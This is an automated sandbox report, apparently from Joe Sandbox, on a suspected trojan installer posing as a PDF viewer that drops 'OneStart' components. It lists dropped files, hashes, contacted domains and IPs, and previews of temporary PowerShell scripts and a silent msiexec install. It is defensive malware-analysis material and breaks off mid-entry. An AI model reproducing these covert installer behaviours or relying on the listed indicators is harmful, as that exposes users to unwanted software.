          C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dll0%ReversingLabs
          No Antivirus matches
          SourceDetectionScannerLabelLink
          g8v1en.com1%VirustotalBrowse
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          g8v1en.com
          18.165.201.17
          truefalseunknown
          d1xdao0g1hqd47.cloudfront.net
          52.222.137.11
          truefalse
            high
            dpseqd9pkrc26.cloudfront.net
            143.204.14.118
            truefalse
              high
              dhb63vq2dmigo.cloudfront.net
              143.204.14.137
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://dhb63vq2dmigo.cloudfront.net/false
                  high
                  http://d1xdao0g1hqd47.cloudfront.net/false
                    high
                    http://dpseqd9pkrc26.cloudfront.net/false
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      143.204.14.137
                      dhb63vq2dmigo.cloudfront.netUnited States
                      16509AMAZON-02USfalse
                      143.204.14.118
                      dpseqd9pkrc26.cloudfront.netUnited States
                      16509AMAZON-02USfalse
                      18.165.201.17
                      g8v1en.comUnited States
                      3MIT-GATEWAYSUSfalse
                      143.204.214.220
                      unknownUnited States
                      16509AMAZON-02USfalse
                      143.204.9.38
                      unknownUnited States
                      16509AMAZON-02USfalse
                      52.222.137.11
                      d1xdao0g1hqd47.cloudfront.netUnited States
                      16509AMAZON-02USfalse
                      108.138.198.136
                      unknownUnited States
                      16509AMAZON-02USfalse
                      Joe Sandbox Version:38.0.0 Beryl
                      Analysis ID:1298923
                      Start date and time:2023-08-28 18:56:03 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                      Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                      Number of analysed new started processes analysed:44
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • EGA enabled
                      Analysis Mode:stream
                      Analysis stop reason:Timeout
                      Sample file name:PDFViewer_44882564 (1).msi
                      Detection:MAL
                      Classification:mal45.troj.evad.winMSI@53/186@10/21
                      Cookbook Comments:
                      • Found application associated with file extension: .msi
                      • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • Timeout during stream target processing, analysis might miss dynamic analysis data
                      • VT rate limit hit for: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:modified
                      Size (bytes):35772
                      Entropy (8bit):5.863974267876024
                      Encrypted:false
                      SSDEEP:
                      MD5:7129D476EBB70E1D1B04E707AC03FB8F
                      SHA1:B4D656533FA96FE55CD46AA3033ABC3BAB8CD864
                      SHA-256:97197D2676217C2C0554793D09612C9FB28DB8F96CCD8296E296C8ACE952CE17
                      SHA-512:B164B46C612680DB759EF7AA79386C75220225E35B67FCDE68915C7604A85A9946CF95EAFB8DFC1DD3B989CF4B6B85E064FB1F7EB8E1E0428438B597DB1D754E
                      Malicious:false
                      Reputation:low
                      Preview:...@IXOS.@.....@8..W.@.....@.....@.....@.....@.....@......&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}..OneStart Bar..OneStartBarSetup.msi.@.....@.....@.....@......icon_OneStart2.exe..&.{2CE2B914-78AF-427B-8432-9E1112FB705D}.....@.....@.....@.....@.......@.....@.....@.......@......OneStart Bar......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{8064D080-8B31-4027-A1D4-2EFE744DD72D}&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}.@......&.{D33FE035-BFCF-4952-91EA-C72C8255422A}&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}.@......&.{AA0BFFD3-140A-470C-B1B1-A4889A10C752}&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}.@......&.{438E3D79-1801-4187-9FC8-D2F881C27033}&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}.@......&.{28602F40-C4A0-4625-B12D-B275293FA86E}&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}.@......&.{EC4EADEE-3AC6-4FE6-AE06-F0061886172B}&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}.@......&.{D67861B4-70A3-45DB-8879-AC519AC8A9
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1464
                      Entropy (8bit):5.429144854396941
                      Encrypted:false
                      SSDEEP:
                      MD5:077C4EC28A1AB175A7A5BDE8902E8B64
                      SHA1:07EF38BC2C96C5F1681FC6B99DC0BFE66703A6EF
                      SHA-256:5993F990F7C73EF6832A7D453347D4F81F2543B9B364CD6B1E48F11F20C66746
                      SHA-512:3B5DE205FDAABE08011BAF12500CA2B511A3D8D3ED22BA97295A3940BE5D2F1C25241267A531D18C2D2F171900A54B01969657062A99FABA9DD7997EBF853976
                      Malicious:false
                      Reputation:low
                      Preview:@...e...........,...................:................@..........P..................]...C....)...,.....(.Microsoft.PowerShell.Commands.ManagementH..................#..A..g&.E$v...... .Microsoft.PowerShell.ConsoleHost0...............e.+.<..K..!..K.#........System..4................q.e...B..SP9?.........System.Core.D................0.9...K.r.*6...........System.Management.AutomationL...............TKZ....M..{.0.........#.Microsoft.Management.Infrastructure.<................/....KA..%*.}2.........System.Management...@...............l._>.CnI.ATB............System.DirectoryServices4...............-..%3..A.s.o.4+.........System.Xml..8.................`..ERC..B9%%.=........System.Numerics.<.................w..WD... . ..........System.Configuration4...............]v.P3..G..............System.Data.H..................!"EA.._>^...........Microsoft.PowerShell.Security...<...............d@..dhD...<.;4!........System.Transactions.D.................!....C...^............System.Configuration.Ins
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):8
                      Entropy (8bit):2.1556390622295662
                      Encrypted:false
                      SSDEEP:
                      MD5:262695B9C138D4B94087961840883F32
                      SHA1:2FD0EEA1F28F0E461DAB95FD2F11EC16C9AF8D75
                      SHA-256:082275AB46FD6D32421D8110FFEA3246FF9D2D0B238DC64ED095A1194AC0BD8C
                      SHA-512:B319AA08CC4A5EFC2D1869765EFFAA2AEC70C064486C7406C4CD00ACBB2739F7E7B9CC9C041F161A9FFC2CE3C7BBCC8654414A34692E9A0041DF5CAB9ADBF0CF
                      Malicious:false
                      Reputation:low
                      Preview:44882564
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):647840
                      Entropy (8bit):6.610508052590557
                      Encrypted:false
                      SSDEEP:
                      MD5:07EBB743BBD7230E04C23BCBAA03FC44
                      SHA1:8E6DEEE1FFB202F60C10AA7D7756395534E40DCF
                      SHA-256:194B29C26D925FDC1F1AA1802714118D0CA30E413C7FEA5C19A928EBA7CC43B0
                      SHA-512:F02B6F0CAA860BA97D5A887BBDB28A6D417B2AA4DDE91BEEFF57A99E05508A10B063EF1D025223FA2F566CC208F86401A38ABC445D20BF208C5A4F92BB53AC24
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................-.o....-.m.....-.l.................................M...................a.................Rich....................PE..L...}..\.........."!.....T..................p............................................@..........................=......(>..d...............................8c......p...............................@............p..T............................text....R.......T.................. ..`.rdata..f....p.......X..............@..@.data....=...P...*...4..............@....rsrc................^..............@..@.reloc..8c.......d...d..............@..B........................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):365216
                      Entropy (8bit):6.403210824336409
                      Encrypted:false
                      SSDEEP:
                      MD5:3144225F1A2DCCFDA435970964158357
                      SHA1:B535C5FCF4B4FDB2B9863CFE89C4362699BDF419
                      SHA-256:A99D2C6FD1667942A085F01784BD599762182FCE8A8F866FA12AC93F52AE2ED1
                      SHA-512:66017AB6A11017B749CD3045597A70B29BE375656FCC03DF6382DDF976B7F14B4DF2BBB378E1EED8DF75651CA9DF1C04E084F50DD8EB9EB7E056E54D47679621
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1.R.1.R.1.RO..R.1.RO..Rr1.RO..R.1.R.Y|S.1.R.Y{S.1.R.YzS.1.R.I.R.1.R.I.R.1.R.1~R.0.RhXvS.1.RhX.S.1.RhX.R.1.R.1.R.1.RhX}S.1.RRich.1.R................PE..L......\.........."!.....n...........................................................5....@.................................x........`..0............x.......p...>......p...........................p...@............................................text..._l.......n.................. ..`.rdata..x............r..............@..@.data........@.......&..............@....rsrc...0....`.......2..............@..@.reloc...>...p...@...8..............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):560
                      Entropy (8bit):5.341802118140659
                      Encrypted:false
                      SSDEEP:
                      MD5:C9992361FC8E0CE715E89E550841B038
                      SHA1:0AD630B1A8B226FB36E44F245685CD12B916949C
                      SHA-256:30EA648D85B74900F82E5CF0A26BDD59BB232A377A70B6702344AFD419AEE097
                      SHA-512:C62200DB3EFAB8C038CC143B63DAA897A4A414EEE830D5103F874905B3EAD8E6B9EB2F858D6589F4161AD4443CD849CE563C1FDE206561CE268EE4ACE5610649
                      Malicious:false
                      Reputation:low
                      Preview:{"response" : "ok"}.."C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" ..C:\Windows\system32\msiexec.exe /V..C:\Windows\syswow64\MsiExec.exe -Embedding 5ADB98630CC4B226B2004FF6626A3D5C C.."C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" ..C:\Windows\syswow64\MsiExec.exe -Embedding 89BFE6A67EA52C9D6229530A7603552C C.."C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2678
                      Entropy (8bit):4.421559387217024
                      Encrypted:false
                      SSDEEP:
                      MD5:F6248B1ED50FFB1185EC5BA785BDB5FD
                      SHA1:436BBC47F1953A54C6494FF1B4733AD256741129
                      SHA-256:04B5A175357FE073EDF386135B27FADF2F0D2F9D039C97F208ABCF15A143AC7A
                      SHA-512:EE5024AF7D887CB1ABC698E027C9258987BE4A7BC12F6991BC7F43008338B41ED1AE458832118CF5169B2BBCF1AA1D3F6F9AC719824F2F1B7EEC8CEF2798B748
                      Malicious:false
                      Reputation:low
                      Preview:....__GENUS : 2..__CLASS : Win32_Process..__SUPERCLASS : CIM_Process..__DYNASTY : CIM_ManagedSystemElement..__RELPATH : Win32_Process.Handle="2240"..__PROPERTY_COUNT : 45..__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}..__SERVER : user-PC..__NAMESPACE : root\cimv2..__PATH : \\user-PC\root\cimv2:Win32_Process.Handle="2240"..Caption : msiexec.exe..CommandLine : "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 .. (1).msi" ..CreationClassName : Win32_Process..CreationDate : 20230828175659.573607+060..CSCreationClassName : Win32_ComputerSystem..CSName : user-PC..Description : msiexec.exe..ExecutablePath : C:\Windows\System32\
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):425
                      Entropy (8bit):1.7799811226519884
                      Encrypted:false
                      SSDEEP:
                      MD5:092349A59A7F9D845C389877C5662F06
                      SHA1:877F53E967EFBA76AAFCAC0665CD6F5F55528420
                      SHA-256:826B24484BA66B4DA60802044F5BF51CAF65841A6176BF64CCE3B58A1FEBB3F5
                      SHA-512:9279F04F4570148BA0EB827F56714C0DC89D91B0478E486C50113D4E258EF5C8BCB94389454F10B0E93646ACC9A288C98CAF250EDA8EC99DABBE6CE204BBE8CE
                      Malicious:false
                      Reputation:low
                      Preview:.... Hive: HKEY_CURRENT_USER\SOFTWARE\OneStart.ai......Name Property ..---- -------- ..OneStart ......
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):583
                      Entropy (8bit):5.099893102603622
                      Encrypted:false
                      SSDEEP:
                      MD5:3130E62FBA508A6DE54DC4F9B0F7AC28
                      SHA1:490729721A5A98531AE677791CAA20943FC590AC
                      SHA-256:B289E780D6F54D07F4AA80111078EA564E34236931417FA48DAD90E74D6BFF3F
                      SHA-512:83C06A35F00F33D9B921094963EBBC7BEDBEFFD112F7A847F88782FEC7AF482A9E94ADE052AD271D7C97B0EE339366AAA5FBF9EEA5DECB913C8E0C15D057D549
                      Malicious:false
                      Reputation:low
                      Preview:Get-Content : Cannot find path 'C:\Users\user\AppData\Roaming\OneStart\.data\wc.json' because it does not exist...At C:\Users\user\AppData\Local\Temp\pss6893.tmp.ps1:20 char:12..+ ... $skInfo = Get-Content "$env:APPDATA/OneStart/.data/wc.json" | Out-S .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (C:\Users\user...t\.data\wc.json:String) [Get-Content], ItemNotFoundEx .. ception.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):621
                      Entropy (8bit):5.135718354468782
                      Encrypted:false
                      SSDEEP:
                      MD5:FBABF978ECD8DC64CE80FCC9A5A0E6F2
                      SHA1:2CF0D3C7FE349EB2CAD31A6F7F551199C93E5455
                      SHA-256:554F81D9F70ACCD907327A66CC34846A11AF789136FCCDFAE627693C1FF63445
                      SHA-512:ED5D2BA48B02B2B9AA4A57FC52D81F6B8BB3AB267C571BC40F3AE9C9AF63B61EE662787EB6C9CCFF83F29A02D4E93B95F4492A1BB9DEAEF41254FEC3E4592929
                      Malicious:false
                      Reputation:low
                      Preview:{"response" : "ok"}..Get-Content : Cannot find path 'C:\Users\user\AppData\Roaming\BBWC\.data\wc.json' because it does not exist...At C:\Users\user\AppData\Local\Temp\pss7052.tmp.ps1:31 char:13..+ ... $skInfo = Get-Content "$env:APPDATA/BBWC/.data/wc.json" | Out-S .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (C:\Users\user...C\.data\wc.json:String) [Get-Content], ItemNotFoundEx .. ception.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand.. ..{"response" : "ok"}..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3572
                      Entropy (8bit):4.5515870399290295
                      Encrypted:false
                      SSDEEP:
                      MD5:0CB7E1FADAA96EB8103DECCDC2A9B702
                      SHA1:1824F466F787387502918EC064122C5F6499E517
                      SHA-256:38A155504BEBD8B6289CE7D3106E1EF2620BFC362FD663AAED72703A4912380E
                      SHA-512:5AA71CBE4DCB2DA00705223AC78945458219520230ED42624B524AE52A115AF5E4701D7262A0AC993C2AC0B3DF19B0827062C97202113C57546BD5A993519C6E
                      Malicious:false
                      Reputation:low
                      Preview:....__GENUS : 2..__CLASS : Win32_Process..__SUPERCLASS : CIM_Process..__DYNASTY : CIM_ManagedSystemElement..__RELPATH : Win32_Process.Handle="6756"..__PROPERTY_COUNT : 45..__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}..__SERVER : user-PC..__NAMESPACE : root\cimv2..__PATH : \\user-PC\root\cimv2:Win32_Process.Handle="6756"..Caption : msiexec.exe..CommandLine : "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 .. (1).msi" ..CreationClassName : Win32_Process..CreationDate : 20230828175630.762617+060..CSCreationClassName : Win32_ComputerSystem..CSName : user-PC..Description : msiexec.exe..ExecutablePath : C:\Windows\System32\
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):610
                      Entropy (8bit):5.134608334249833
                      Encrypted:false
                      SSDEEP:
                      MD5:172F59FFC6853FAEEA85E9ACE14AF5CD
                      SHA1:C7CECED24069489EFD89F0C7FED594F073FFF53D
                      SHA-256:64A3E5C5F9AA12C9600239A4E3C93F0E199F718173ECE5837C3089EE7376B813
                      SHA-512:5B6E51126DFFB4A3639A4370503EF90068CB6C913534F602D534A295A7BF82DFA2F058BCAC4793F89488920963231B2D0FF8D1469AB966D66622D0478139AE2A
                      Malicious:false
                      Reputation:low
                      Preview:Get-ItemPropertyValue : Cannot find path 'HKCU:\SOFTWARE\OneStart.ai\OneStart Software' because it does not exist...At C:\Users\user\AppData\Local\Temp\pss9D8A.tmp.ps1:13 char:16..+ ... $ret = Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\OneStart.ai\O .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (HKCU:\SOFTWARE\...eStart Software:String) [Get-ItemPropertyValue], Item .. NotFoundException.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetItemPropertyValueCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):424
                      Entropy (8bit):2.4898548841924786
                      Encrypted:false
                      SSDEEP:
                      MD5:48E7764699FC5D737547E02EC51EED0F
                      SHA1:0D6BAE6E5936361E168A01DCD83DB3CBB26474E3
                      SHA-256:D4C7988A080228A143E643C3CF9C7B0EBFD49777E780C8B1E6F75EDFC97A8B37
                      SHA-512:684A944D239B88F3E437A54600CFF76836EB8079079AEE870D80C6890C22E3DCB3AD99EB434C42DD703EE6F6CECE6BD0DDE5D643FB11AE53F0D4485F8BF97BC3
                      Malicious:false
                      Reputation:low
                      Preview:.... Directory: C:\Users\user\AppData\Roaming......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 8/28/2023 6:56 PM OneStart ......
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1822
                      Entropy (8bit):3.5700724147522136
                      Encrypted:false
                      SSDEEP:
                      MD5:F994415492500FEE4841C40390463725
                      SHA1:710482FC7B317299E6BFC36028885B8942EF256F
                      SHA-256:04313C0DF4A79430CD4F079CA16E6691611525C05D8263200DFC8641A39E3AA0
                      SHA-512:1793C923DC9B301A6CA09B9B87B2EA117BA207465AE8D7924A687AC2A1F90F31A6689112CC4602F205E83A8A94DC415656DD8D00D571298D04CCDADD2AA9F3A5
                      Malicious:false
                      Reputation:low
                      Preview:.... Directory: C:\Users\user\AppData\Local......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 8/28/2023 6:56 PM OneStart.ai ...... Directory: C:\Users\user\AppData\Local\OneStart.ai......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 8/28/2023 6:56 PM OneStart ...... Directory: C:\Users\user\AppData\Local\OneStart.ai\OneStart......Mode LastWriteTime Length Name
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):583
                      Entropy (8bit):5.073200575099075
                      Encrypted:false
                      SSDEEP:
                      MD5:D76204F2E1427CE2539B536DA8B39E11
                      SHA1:32972DE8DF37823922033664DC4C139EB461002E
                      SHA-256:21A7A1115F4628FFC8AF2927333E8E8F1A681178C9CFB949A4DEF38951C18974
                      SHA-512:24201FF3E911AC7EE06C16D4E6CCF5E073CFF0BDAFF17D7ED123FA5BE754AA941834949EDD550B3FA69F9C635E554AC528C9DA627D8DB6578EDAAC83ECC6D4DC
                      Malicious:false
                      Reputation:low
                      Preview:Get-Content : Cannot find path 'C:\Users\user\AppData\Roaming\OneStart\.data\wc.json' because it does not exist...At C:\Users\user\AppData\Local\Temp\pssC2EC.tmp.ps1:20 char:12..+ ... $skInfo = Get-Content "$env:APPDATA/OneStart/.data/wc.json" | Out-S .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (C:\Users\user...t\.data\wc.json:String) [Get-Content], ItemNotFoundEx .. ception.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):610
                      Entropy (8bit):5.123333185793149
                      Encrypted:false
                      SSDEEP:
                      MD5:72C6C04EAEFF65DD0F64909076709F33
                      SHA1:DE3A04AB5D8F0B073A595117F62C0C61181AE420
                      SHA-256:881C40A240EC92569982D5CA6F1E74D92AE30B00636872ACAAF1C1FBA807C216
                      SHA-512:9F6EE97ADBAAD6AA12EEEE9DFA4D2872AABFF8989B21433909D4E445402C19011D7D99B13B4BF72E226FBACD8D3A0185324FABE02620688CB43B271DD5EC8492
                      Malicious:false
                      Reputation:low
                      Preview:Get-ItemPropertyValue : Cannot find path 'HKCU:\SOFTWARE\OneStart.ai\OneStart Software' because it does not exist...At C:\Users\user\AppData\Local\Temp\pssC7FA.tmp.ps1:13 char:16..+ ... $ret = Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\OneStart.ai\O .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (HKCU:\SOFTWARE\...eStart Software:String) [Get-ItemPropertyValue], Item .. NotFoundException.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetItemPropertyValueCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):5
                      Entropy (8bit):2.321928094887362
                      Encrypted:false
                      SSDEEP:
                      MD5:1764352FBFD4CC5558C37EDD72A0A3A5
                      SHA1:4996051E3D94C9DC04D2EE00CE2650F59A9BBF0B
                      SHA-256:99CFF99449DC635CAFEA9274EB80DC34711977494E2CF5756899BE115D296FAF
                      SHA-512:81A63F26F0C91E6FA650109CD007CE59E929CBF96BF68EC8DD8E35D6011C42730C7B540305F5DFBC421491655FB4BF6A650021D7BDB19FECE40447C2460E2284
                      Malicious:false
                      Reputation:low
                      Preview:OstWC
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Reputation:low
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):68
                      Entropy (8bit):3.0695232318239793
                      Encrypted:false
                      SSDEEP:
                      MD5:D09597341602C15067A664CA5A163E14
                      SHA1:32EA3DB58189672CB3AF1FA328605E3D99FB0A86
                      SHA-256:C69861A35F959AEE141F8806A4D438D328F434877A506F9CC698C8ABB2CDA106
